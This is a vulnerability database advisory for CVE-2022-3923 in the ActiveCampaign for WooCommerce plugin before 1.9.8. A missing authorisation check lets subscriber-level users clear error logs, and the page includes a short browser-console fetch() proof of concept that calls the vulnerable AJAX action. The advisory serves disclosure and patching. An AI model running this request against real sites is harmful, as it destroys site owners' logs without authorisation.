ActiveCampaign for WooCommerce < 1.9.8 – Subscriber+ Error Log Cleanup | CVE 2022-3923 | Plugin Vulnerabilities

Description

The plugin does not have authorisation check when cleaning up its error logs via an AJAX action, which could allow any authenticated users, such as subscriber to call it and remove error logs.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user:

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=activecampaign_for_woocommerce_clear_error_log',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

activecampaign-for-woocommerce

Fixed in 1.9.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

6536946a-7ebf-4f8f-9446-36ec2a2a3ad2

Timeline

Publicly Published

2022-12-16 (about 1 years ago)

Added

2022-12-16 (about 1 years ago)

Last Updated

2023-07-19 (about 9 months ago)

Other

Published

Title

Published

2023-12-12

Title

CAOS < 4.7.15 - Unauthenticated Settings Update

Published

2024-01-17

Title

WooCommerce Subscriptions < 5.8.0 - Missing Authorization

Published

2023-04-19

Title

WooCommerce Order Status Change Notifier <= 1.1.0 - Subscriber+ Arbitrary Order Status Update

Published

2022-11-08

Title

Blog2Social < 6.9.12 - Subscriber+ Settings Update

Published

2023-06-03

Title

B2BKing < 4.6.20 - Subscriber+ Arbitrary Products Price Update